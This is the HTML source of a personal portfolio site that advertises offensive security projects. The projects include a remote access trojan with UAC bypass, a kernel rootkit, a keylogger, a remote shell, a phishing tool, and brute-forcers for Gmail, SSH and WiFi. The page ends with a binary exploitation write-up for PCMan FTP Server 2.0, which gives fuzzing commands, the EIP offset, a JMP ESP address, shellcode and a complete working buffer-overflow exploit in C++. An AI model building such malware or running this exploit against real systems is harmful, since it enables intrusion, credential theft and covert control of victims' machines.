-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
736 lines (522 loc) · 26.6 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="fonts.css">
<link rel="stylesheet" href="index.css">
<link rel="icon" href="Images/ElliotAldersonLogo.png">
<script src="js/jquery-3.4.1.min.js"></script>
<title>Elliot Alderson</title>
</head>
<body>
<nav>
<a href="index.html">Elliot</a>
<a href="#" id="About">About</a>
<a href="#" id="Projects">Project's</a>
<a target="_blank" href="https://github.com/ElliotAlderson51">GitHub</a>
<a href="#" id="HireMe">Hire Me</a>
</nav>
<div class="Elliot">
<div class="Logo">
<img src="Images/ElliotAldersonLogo.png">
</div>
<div class="Title">
<label>Elliot Alderson</label>
</div>
<div class="subTitle">
<label>Based in Israel</label>
</div>
<div class="Text">
<p>
Hello friend. Hello friend? That’s lame. Maybe I should give you a name? But that’s a slippery slope. You’re only in my head. We have to remember that. Shit. It’s actually happened. I’m talking to an imaginary person.
What I’m about to tell you is top secret. A conspiracy bigger than all of us. There’s a powerful group of people out there that are secretly running the world. I’m talking about the guys no one knows about. The guys that are invisible. The top one percent of the top one percent. The guys that play God without permission.
And now I think they’re following me.
</p>
</div>
<div class="AboutText">
<p>
Hi! as you can see I really love the show MR. Robot..
So I'm from Israel, and I'm intersting in Windows Internals, Malware Development, and currently
start stduying about WiFi Hacking.. In the future I'll Build a device that have all of my tools! </br>
What I have study before?: Windows Internals, Windows Drivers, Windows API, C++, C, Assembly, Web Development, Deep Understanding of Social Engineering,
Basic Arduino, Basic Linux, PHP and more... <br> <br>
<a target="_blank" href="https://bmc.link/ElliotAlderson">☕ Buy Me a Coffee</a> (:
</p>
</div>
<div class="HireMeText">
<p>
Hi! Do you want me to help you with something? Im here for you! <br>
Soon I'll Update a contact email, untill then you can send me a message on github! or <br> <br>
<a target="_blank" href="https://bmc.link/ElliotAlderson">☕ Buy Me a Coffee</a> (:
</p>
</div>
</div>
<div class="ProjectsGallery">
<div class="project">
<img src="Images/BotProfile.png">
<a href="#" id="FsocietyRAT">Fsociety RAT</a>
</div>
</div>
<div class="ProjectsGallery">
<div class="project">
<img src="Images/FsocietyPhishingToolMain.png">
<a href="#" id="PhishingTool">Fsociety Phishing Tool</a>
</div>
</div>
<div class="ProjectsGallery">
<div class="project">
<video controls muted>
<source src="videos/BypassUAC_video.mp4" type="video/mp4">
</video>
<a href="#" id="BypassUAC">Auto/Manual UAC Bypass</a>
</div>
</div>
<div class="ProjectsGallery">
<div class="project">
<img src="Images/RootkitWallpaper.jpg">
<a href="#" id="Rootkit">Kernel Rootkit for Windows 32bit</a>
</div>
</div>
<div class="ProjectsGallery">
<div class="project">
<img src="Images/brute-force-attack.png">
<a href="#" id="BruteForce">Brute Force</a>
</div>
</div>
<div class="ProjectsGallery">
<div class="project">
<img src="Images/BinaryExploitation.png">
<a href="#" id="BinaryExploitation">Binary Exploitation</a>
</div>
</div>
<div class="FsocietyRAT">
<h1>Fsociety RAT</h1>
<div class="Text">
<p>
It was really fun to make this project! This project have a lot of great features and a very good website control for the bots.
The final Malware will bypassing UAC, installing rootkit on 32 bit systems, obfuscated strings, Anti-VM technique, Process Hollowing , Communicate with the website control using CURL (curl is preinstalled in every windows!).
</p> <br> <hr> <br>
<h2>RAT</h2>
<h3>Malware Persistence Techniques</h3> <br>
✔️ The malware hiding a DLL to bypass UAC and a Rootkit in new sections. <br>
✔️ Bypassing UAC using UAC hijacking on the program ComputerDefaults.exe in a "Windows " folder. <br>
✔️ Create a task for the malware in Task Schduler in the path "Microsoft\\Windows\\Security" with high privileges. <br>
✔️ If the system is 32-bit install and start the rootkit. <br>
✔️ If the system is 64-bit the malware will start Process Hollowing <br> <br>
<h3>Malware Attacks</h3>
<p>The malware communicate with a control website, this is the current attacks:</p> <br>
✔️ Screenshot <br>
✔️ Task Scheduler <br>
✔️ Remote Shell <br>
✔️ File Manager <br>
✔️ File Explorer <br>
✔️ Keylogger <br>
✔️ Client Info <br> <br>
<h3>Website Control Images</h3>
<p><i>Main website control</i> - list the clients and show info about them</p>
<img src="Images/FsocietyRat.png">
<p><i> Victim profile page</i> - Contain the attacks options</p>
<img src="Images/BotProfile.png">
<br> <hr> <br>
<h2>Rootkit</h2>
<p>The Rootkit is for 32-bit systems. <a href="https://github.com/ElliotAlderson51/Kernel-Rootkit-32Bit">Click to see the Rootkit project on GitHub</a></p>
<h3>What the Rootkit can do?</h3>
<h4>Hook the SSDT</h4> <br>
✔️ Protect Files (Read\Write\Create\Delete\Rename\Open\Execute) <br>
✔️ Hide Process <br>
✔️ Protect Process, Thread <br>
✔️ Protect Registry Keys (Open\Create\Delete\Set) <br>
✔️ Bypass privilege checks <br>
<br> <hr> <br>
<h2>DLL - Bypass UAC</h2>
<p>Create a DLL that will be hijacked to ComputerDefaults to start the malware with high privilege.</p>
<p><a href="https://github.com/ElliotAlderson51/Bypass-UAC">Click to see the BypassUAC project on GitHub</a></p> <br>
<hr>
<h2>section_injector</h2>
<p>This Projects will inject a file to new section in another file.</p>
<pre> Injector.exe "section name" "target" "file"</pre>
<br> <hr> <br>
<h2>Websites</h2>
<h3>Fsociety Control Website</h3>
<p>This is the Control Website the malware is communicate with to get the commands to execute.</p>
<h3>Fsociety Redirect Website</h3>
<p>This website have hardcoded url in the malware code, the malware will get the Control Website url from this website. <br>
I create this website so if there is a problem with the Control Website you can just upload the Control Website again and change the url in this website. </p>
<br> <hr> <br>
<h2>Sub Projects</h2>
<p>This solutions was helping me to build the final malware</p> <br>
<h3>Initialize RAT</h3>
<p>This automated the build of the final malware.</p> <br>
✔️ UPX the DLL file <br>
✔️ Inject the DLL and the Rootkit to new sections. <br> <br>
<h3>Encoding_Decoding</h3>
<p>This helps me to obfuscate the strings in the malware.</p>
<br> <hr> <br>
<h2>TODO</h2> <br>
<p> <b>*</b> Obfuscate Imports</p>
<br> <hr> <br>
<p>This project is for <b><i>EDUCATIONAL PURPOSES ONLY</i></b>. You are the only responsable for your actions! <b> Happy Hacking (; </b> </p>
<br><br><br>
</div>
</div>
<div class="BypassUAC">
<h1>BypassUAC</h1>
<h2>Bypassing Windows 10 with mock folder and DLL Hijacking </h2> <br>
<div class="Text">
<p><b>Hey, I make two projects to bypass UAC:</b></p> <br>
<p><b>1.</b> Manual</p> <br>
<p><b>2.</b> Auto</p> <br>
<p>You will find in each folder (Munual/Auto) a README.md file with explanation! <br> </p> <br>
<h3>How it works?</h3>
<p>The program will create a <i>"Windows "</i> folder and the windows will think that this is the original <i>"Windows"</i> folder. <br>
The program will copy the <i>"ComputerDefaults.exe"</i> into the <i>"Windows /System32"</i> and then Extract the DLL from the PE section into the <i>"Windows /System32"</i> with the name <i>"Secur32.dll"</i>. <br>
Start the ComputerDefaults.exe, and this will perform a DLL Hijacking and BypassUAC. The DLL will start whatever you want.. it can be a CMD or the program that do all of this automatically. </p> <br>
<br> <hr> <br>
<p>This project is for <b><i>EDUCATIONAL PURPOSES ONLY</i></b>. You are the only responsable for your actions! <b> Happy Hacking (; </b> </p>
<br><br><br>
</div>
</div>
<div class="Rootkit">
<h1>Kernel Rootkit</h1>
<div class="Text">
<h2>Introduction</h2>
<p>Hey, after I read the books:</p> <br>
"<a href="https://www.amazon.com/Windows-Kernel-Programming-Pavel-Yosifovich/dp/1977593372">Windows Kernel Programming</a>" by Pavel Yosifovich <br>
"<a href="https://www.amazon.com/Rootkit-Arsenal-Escape-Evasion-Corners/dp/144962636X">The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System 2nd Edition</a>" by Bill Blunden <br>
<br>
<p>
I decide to create a Kernel Rootkit for 32-bit system. <br>
Now I'll start learning how to create a Kernel Rootkit for 64-bit! <br>
Enjoy. <br>
</p>
<h2>What the Rootkit can do?</h2>
<h3>Hook the SSDT</h3>
✔️ Protect Files (Read\Write\Create\Delete\Rename\Open\Execute) <br>
✔️ Hide Process <br>
✔️ Protect Process, Thread <br>
✔️ Protect Registry Keys (Open\Create\Delete\Set) <br>
✔️ Bypass privilege checks <br>
<br> <hr> <br>
<p>This project is for <b><i>EDUCATIONAL PURPOSES ONLY</i></b>. You are the only responsable for your actions! <b> Happy Hacking (; </b> </p>
<br> <br> <br>
</div>
</div>
<div class="PhishingTool">
<h1>Fsociety Phishing Tool</h1>
<div class="Text">
<p>I built this tool 2 years ago using python. In the <a href="https://github.com/ElliotAlderson51/Fsociety-Phishing-Tool" target="_blank">project GitHub Page</a> you can find what website you can spoof.</p>
<a href="Images/FsocietyPhishingToolMain.png" target="_blank"> <img src="Images/FsocietyPhishingToolMain.png"> </a>
<br> <hr> <br>
<p>This project is for <b><i>EDUCATIONAL PURPOSES ONLY</i></b>. You are the only responsable for your actions! <b> Happy Hacking (; </b> </p>
<br><br><br>
</div>
</div>
<div class="BruteForce">
<h1>Brute Force Attack</h1>
<div class="Text">
<p>Like the <a href="#" id="go_to_FsocietyPhishingTool_id">Fsociety Phishing Tool</a> I built this tool 2 years ago using Python. <br> This project is in GitHub <a href="https://github.com/ElliotAlderson51/Brute-Force" target="_blank">here</a>
and have the following Brute Force features:</p><br> <br>
<p>
✔️ <a href="https://github.com/ElliotAlderson51/Brute-Force/blob/master/Email/src/BruteFurce_Email.py" target="_blank">Gmail</a><br> <br>
✔️ <a href="https://github.com/ElliotAlderson51/Brute-Force/blob/master/SSH/BruteForce%20SSH%201.0/SSH_BruteForce.py" target="_blank">SSH</a> <br> <br>
✔️ <a href="https://github.com/ElliotAlderson51/Brute-Force/blob/master/Wifi/BruteForce%20Wifi%201.0/BF_Wifi.py" target="_blank">WIFI</a> <br> <br>
✔️ <a href="https://github.com/ElliotAlderson51/Brute-Force/blob/master/Zip/src/ZipCracker.py" target="_blank">Zip</a> <br>
</p>
<br> <hr> <br>
<p>This project is for <b><i>EDUCATIONAL PURPOSES ONLY</i></b>. You are the only responsable for your actions! <b> Happy Hacking (; </b> </p>
<br><br><br>
</div>
</div>
<div class="beGallery">
<div class="project">
<img src="Images/GithubWallpaper.jpg">
<a target="_blank" href="https://github.com/ElliotAlderson51/Exploit-Writeups">Exploit Writeups - GitHub</a>
</div>
</div>
<div class="beGallery">
<div class="project">
<img src="Images/BinaryExploitation.png">
<a href="#" id="be1">PCMAN's FTP Server 2.0</a>
</div>
</div>
<div class="be1">
<div class="Text">
<p>Hey this is my first Exploit Writeup post for practice Binary Exploitation in Windows! I make for myself a folder with a lot of vulnerabilities software with
a random name like 48504 and then I choose one randomaly and start investigate the program and exploit it.
<br><br>
File: <a href="binary_exploitation_files/photos/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z" target="_blank">9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z</a>
</p>
<hr>
<h1>Challenge 1: 45745</h1>
<p>
After Extract I can see that the exe file name is PCManFTPD2. By the name of the file I can assume that this program is an FTP server or just use the ftp protocol.
<br><br>
When I run the program I can confirm that this program is an FTP server.
All of the text in the server is in Chinese so its kind of hard to understand the program.
<br><br>
"PCMan’s FTP Server 2.0 – Copyright © 2005" <br> <br>
After playing a little bit in the server I can see that the server accept a USER anonymous and PASS anonymous to login.. <br>
</p>
<br> <h2>Fuzzing</h2>
<p>
I try to fuzz the USER option in the server using the SPIKE tool on Kali Linux using the following command: <br> <br>
<pre>  generic_send_tcp 192.168.106.138 21 spike.spk 0 0</pre>
</p>
<p>
<br><br>
The spike.spk file will look like this: <br>
</p>
<pre>
s_readline();
s_string("USER ");
s_string_variable("0");</pre>
<br>
<p>
And the result is: <br> <br>
<img src="binary_exploitation_files/photos/PCMAN FTP crashed.png"> <br> <br>
We successfully crashed the program!!
</p>
<br><h2>Finding the EIP Offset</h2><br>
<p>
Let's create a pattern using the following command in Kali Linux:
</p>
<pre> msf-pattern_create -l 5000</pre> <br>
<p>
Now we can start writing our exploit, I'll write my exploit in C++ on visual studio.
</p>
<pre>
#include "C:\\BE\\includes.h"
/*
PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
EIP offset:
badchars:
*/
std::string pattern = "…”;
int main()
{
Client c;
c.Start("192.168.106.138", 21);
// Receive first message from the server
std::string temp = "";
c.Recv(temp);
std::string exploit = pattern;
// Start the exploit
c.Send(exploit);
return 0;
}
</pre><br>
<p>
After we run this program you can see that the ftp server crashed, and the EIP has been overwrite with the value of:43396F43 <br><br>
Using the following command we can get the offset of the EIP: <br> <br>
<img src="binary_exploitation_files/photos/PCMAN EIP offset.png"> <br> <br>
And we can see that the offset is 2007
</p>
<br><h2>Overwrite the EIP</h2><br>
<p>
Lets see if we can overwrite the EIP with “BBBB”:
</p>
<pre>
#include "C:\\BE\\includes.h"
/*
PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
EIP offset: 43396F43 -> [*] Exact match at offset 2007
badchars:
*/
int main()
{
Client c;
c.Start("192.168.106.138", 21);
// Receive first message from the server
std::string temp = "";
c.Recv(temp);
// Generate A's
int offset = 2007;
std::string A = MultipleString("A", offset);
// Generate padding
std::string padding = MultipleString("D", 5000 - offset - 4);
std::string exploit = A + "BBBB" + padding;
// Start the exploit
c.Send(exploit);
return 0;
}
</pre>
<p>
Run the program in Immunity Debugger and see that It's works! The EIP now is "42424242". <br> We successfully overwrite the EIP! <br>
</p>
<br><h2>Find JMP ESP</h2><br>
<p>
The next step in our exploit will be the jmp to our shellcode. <br>
Using mona we can search for a JMP ESP, I use the following command in Immunity Debugger:
</p>
<pre> !mona jmp -r ESP</pre>
<p>And seem like that mona not found a valid JMP ESP with a Non ASLR, DEP, SafeSEH... I'll keep this first exploit simple and just search for a JMP ESP in KERNEL32.dll:</p>
<pre> !mona jmp -r ESP -m KERNEL32.dll</pre>
<p>And the result is: </p>
<pre>
Address = 7667E8F3
Message = 0x7667e8f3 (b+0x0003e8f3) : jmp esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.18015 (C:\Windows\system32\kernel32.dll)</pre>
<p>Current Exploit:</p>
<pre>
#include "C:\\BE\\includes.h"
/*
PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
----------------------------------------------
EIP offset: 43396F43 -> [*] Exact match at offset 2007
JMP ESP:
Address= 7667E8F3 -> "\xf3\xe8\x67\x76"
Message= 0x7667e8f3 (b+0x0003e8f3) : jmp esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.18015 (C:\Windows\system32\kernel32.dll)
badchars:
*/
int main()
{
Client c;
c.Start("192.168.106.138", 21);
// Receive first message from the server
std::string temp = "";
c.Recv(temp);
// Generate A's
int offset = 2007;
std::string A = MultipleString("A", offset);
// Generate padding
std::string padding = MultipleString("D", 5000 - offset - 4);
std::string exploit = A + "\xf3\xe8\x67\x76" + padding;
// Start the exploit
c.Send(exploit);
return 0;
}
</pre>
<br><h2>Find Bad Characters</h2><br>
<p>
This is not a tutorial so I just generate a badchars and tell you what I found:
</p>
<img src="binary_exploitation_files/photos/Bad Characters.png">
<p>The Bad Characters that I found is the following: </p>
<pre> “\x0a\x0d”</pre>
<br><h2>Calculator Shellcode:</h2><br>
<p>
I will use this calculator shellcode for our exploit:
</p>
<pre>
char calc_shellcode[] =
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7"; </pre>
<br><h2>Final Exploit</h2><br>
<p>
The final exploit is:
</p>
<pre>
#include "C:\\BE\\includes.h"
/*
PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
----------------------------------------------
EIP offset: 43396F43 -> [*] Exact match at offset 2007
JMP ESP:
Address= 7667E8F3 -> "\xf3\xe8\x67\x76"
Message= 0x7667e8f3 (b+0x0003e8f3) : jmp esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.18015 (C:\Windows\system32\kernel32.dll)
badchars: "\x0a\x0d"
*/
int main()
{
Client c;
c.Start("192.168.106.138", 21);
// Receive first message from the server
std::string temp = "";
c.Recv(temp);
// Generate A's
int offset = 2007;
std::string A = MultipleString("A", offset);
// Generate nopsled
std::string nops = MultipleString("\x90", 20);
// Shellcode
char calc_shellcode[] =
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7";
// Generate padding
std::string padding = MultipleString("D", 5000 - offset - 4 - nops.length() - (sizeof(calc_shellcode) / sizeof(calc_shellcode[0])));
std::string exploit = A + "\xf3\xe8\x67\x76" + nops + calc_shellcode + padding;
// Start the exploit
c.Send(exploit);
return 0;
}</pre>
<br><p>Thanks for reading!</p> <br> <br>
</div>
</div>
<script>
$("#About").click(function()
{
$(".Elliot").show();
$(".Elliot .Text").hide();
$(".Elliot .HireMeText").hide();
$(".ProjectsGallery").hide();
$(".Elliot .AboutText").show();
$(".be1").hide();
});
$("#HireMe").click(function()
{
$(".Elliot .Text").hide();
$(".Elliot .AboutText").hide();
$(".ProjectsGallery").hide();
$(".Elliot .HireMeText").show();
$(".be1").hide();
});
$("#Projects").click(function()
{
$(".Elliot").hide();
$(".Elliot .AboutText").hide();
$(".Elliot .HireMeText").hide();
$(".FsocietyRAT").hide();
$(".BypassUAC").hide();
$(".Rootkit").hide();
$(".PhishingTool").hide();
$(".BruteForce").hide();
$(".be1").hide();
$(".ProjectsGallery").show();
});
$("#FsocietyRAT").click(function()
{
$(".ProjectsGallery").hide();
$(".FsocietyRAT").show();
});
$("#BypassUAC").click(function()
{
$(".ProjectsGallery").hide();
$(".BypassUAC").show();
});
$("#Rootkit").click(function()
{
$(".ProjectsGallery").hide();
$(".Rootkit").show();
});
$("#PhishingTool").click(function()
{
$(".ProjectsGallery").hide();
$(".PhishingTool").show();
});
$("#BruteForce").click(function()
{
$(".ProjectsGallery").hide();
$(".BruteForce").show();
});
$("#BinaryExploitation").click(function()
{
$(".ProjectsGallery").hide();
$(".beGallery").show();
});
$("#be1").click(function()
{
$(".beGallery").hide();
$(".be1").show();
});
</script>
</body>
</html>